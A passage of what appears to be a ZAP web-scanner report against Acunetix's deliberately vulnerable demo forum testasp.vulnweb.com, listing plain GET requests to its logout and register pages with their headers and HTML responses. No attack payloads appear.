| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=6 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=6">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=7 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=7">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=8">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=9 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=9">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3615 |
| Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3613 |
| Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3554 |
| Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" 